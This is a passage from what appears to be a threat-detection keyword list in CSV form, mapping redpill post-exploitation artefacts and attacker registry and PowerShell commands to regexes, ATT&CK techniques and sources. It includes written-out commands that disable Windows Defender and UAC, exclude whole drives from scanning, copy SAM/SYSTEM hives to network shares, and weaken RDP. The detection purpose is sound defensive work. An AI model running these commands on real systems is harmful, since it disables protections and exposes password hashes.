tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* ps2exe.ps1*",".{0,1000}\sps2exe\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - 
T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*.ps1 -sysinfo Enum*",".{0,1000}\.ps1\s\-sysinfo\sEnum.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/ps2exe.ps1*",".{0,1000}\/ps2exe\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" 
"*/vbs2exe.exe*",".{0,1000}\/vbs2exe\.exe.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\credentials.log*",".{0,1000}\\credentials\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Get-AVStatus.ps1*",".{0,1000}\\Get\-AVStatus\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\ksjjhav.log*",".{0,1000}\\ksjjhav\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\list-recycle-bin.ps1*",".{0,1000}\\list\-recycle\-bin\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\OutlookEmails.log*",".{0,1000}\\OutlookEmails\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - 
T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\ps2exe.ps1*",".{0,1000}\\ps2exe\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Screenshot.exe*",".{0,1000}\\Screenshot\.exe.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Screenshot.ps1*",".{0,1000}\\Screenshot\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 
- T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Temp\clipboard.log*",".{0,1000}\\Temp\\clipboard\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Temp\dave.log*",".{0,1000}\\Temp\\dave\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" 
"*\Temp\fsdgss.log*",".{0,1000}\\Temp\\fsdgss\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\vbs2exe.exe*",".{0,1000}\\vbs2exe\.exe.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*BATtoEXEconverter.bat*",".{0,1000}BATtoEXEconverter\.bat.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*identify_offensive_tools.ps1*",".{0,1000}identify_offensive_tools\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Mitre-T1202.ps1*",".{0,1000}Mitre\-T1202\.ps1.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Temp\iprange.log*",".{0,1000}Temp\\iprange\.log.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - 
T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*vbs2exe.exe *",".{0,1000}vbs2exe\.exe\s.{0,1000}","greyware_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","209","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* /v ""DisableAntiSpyware"" /t REG_DWORD /d ""1"" /f*",".{0,1000}\s\/v\s\""DisableAntiSpyware\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* /v ""DisableAntiVirus"" /t REG_DWORD /d ""1"" /f*",".{0,1000}\s\/v\s\""DisableAntiVirus\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense 
Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* /v ""DisableIOAVProtection"" /t REG_DWORD /d ""1"" /f*",".{0,1000}\s\/v\s\""DisableIOAVProtection\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* /v ""DisableOnAccessProtection"" /t REG_DWORD /d ""1"" /f*",".{0,1000}\s\/v\s\""DisableOnAccessProtection\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* /v ""DisableRealtimeMonitoring"" /t REG_DWORD /d ""1"" /f*",".{0,1000}\s\/v\s\""DisableRealtimeMonitoring\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* /v ""DisableScanOnRealtimeEnable"" /t REG_DWORD /d ""1"" /f*",".{0,1000}\s\/v\s\""DisableScanOnRealtimeEnable\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense 
Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* /v ""MpEnablePus"" /t REG_DWORD /d ""0"" /f*",".{0,1000}\s\/v\s\""MpEnablePus\""\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112 ","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*copy *sam.hive \\*",".{0,1000}copy\s.{0,1000}sam\.hive\s\\\\.{0,1000}","greyware_tool_keyword","reg","the commands are used to copy exported SAM and SYSTEM registry hives (which contain sensitive Windows security data including hashed passwords for local accounts) to a UNC path such as a network share. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*copy *system.hive \\*",".{0,1000}copy\s.{0,1000}system\.hive\s\\\\.{0,1000}","greyware_tool_keyword","reg","the commands are used to copy exported SAM and SYSTEM registry hives (which contain sensitive Windows security data including hashed passwords for local accounts) to a UNC path such as a network share. 
By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System* /v EnableLUA /t REG_DWORD /d 0 /f*",".{0,1000}HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System.{0,1000}\s\/v\sEnableLUA\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disables User Account Control","T1112","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/nathanlopez/Stitch/blob/8e22e91c94237959c02d521aab58dc7e3d994cea/PyLib/disableUAC.py#L8","1","0","N/A","N/A","10","10","3039","657","2024-01-04T20:02:51Z","2017-01-06T02:26:01Z" "*powershell.exe -nop -c Add-MpPreference -ExclusionPath ""C:\""*",".{0,1000}powershell\.exe\s\-nop\s\-c\sAdd\-MpPreference\s\-ExclusionPath\s\""C\:\\\"".{0,1000}","greyware_tool_keyword","reg","add entire disks exclusions to Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*powershell.exe -nop -c Add-MpPreference -ExclusionPath ""D:\""*",".{0,1000}powershell\.exe\s\-nop\s\-c\sAdd\-MpPreference\s\-ExclusionPath\s\""D\:\\\"".{0,1000}","greyware_tool_keyword","reg","add entire disks exclusions to Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*powershell.exe -nop -c Add-MpPreference -ExclusionPath 
""E:\""*",".{0,1000}powershell\.exe\s\-nop\s\-c\sAdd\-MpPreference\s\-ExclusionPath\s\""E\:\\\"".{0,1000}","greyware_tool_keyword","reg","add entire disks exclusions to Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*powershell.exe -nop -c Add-MpPreference -ExclusionPath ""F:\""*",".{0,1000}powershell\.exe\s\-nop\s\-c\sAdd\-MpPreference\s\-ExclusionPath\s\""F\:\\\"".{0,1000}","greyware_tool_keyword","reg","add entire disks exclusions to Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Real-Time Protection"" /v ""DisableBehaviorMonitoring"" /t REG_DWORD /d ""1"" /f*",".{0,1000}Real\-Time\sProtection\""\s\/v\s\""DisableBehaviorMonitoring\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers""*",".{0,1000}reg\sadd\s\""HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal\sServer\sClient\\Servers\"".{0,1000}","greyware_tool_keyword","reg","could be used to manipulate system behavior or remove evidence","T1112 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense 
Evasion","https://github.com/xiaoy-sec/Pentest_Note/blob/52156f816f0c2497c25343c2e872130193acca80/wiki/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/Windows%E6%8F%90%E6%9D%83/RDP%26Firewall/%E5%88%A0%E9%99%A4%E7%97%95%E8%BF%B9.md?plain=1#L4","1","0","N/A","N/A","10","10","3635","918","2023-05-22T03:50:57Z","2020-06-15T02:58:36Z" "*REG ADD ""HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services"" /f /v fAllowUnsolicited /t REG_DWORD /d ""00000001""*",".{0,1000}REG\sADD\s\""HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Terminal\sServices\""\s\/f\s\/v\sfAllowUnsolicited\s\/t\sREG_DWORD\s\/d\s\""00000001\"".{0,1000}","greyware_tool_keyword","reg","making Remote Desktop Protocol (RDP) more vulnerable to unauthorized access.","T1021 - T1112","TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L19","1","0","N/A","N/A","8","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services"" /f /v fDenyTSConnections /t REG_DWORD /d ""00000000""*",".{0,1000}REG\sADD\s\""HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Terminal\sServices\""\s\/f\s\/v\sfDenyTSConnections\s\/t\sREG_DWORD\s\/d\s\""00000000\"".{0,1000}","greyware_tool_keyword","reg","making Remote Desktop Protocol (RDP) more vulnerable to unauthorized access.","T1021 - T1112","TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L19","1","0","N/A","N/A","8","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services"" /f /v UserAuthentication /t REG_DWORD /d 
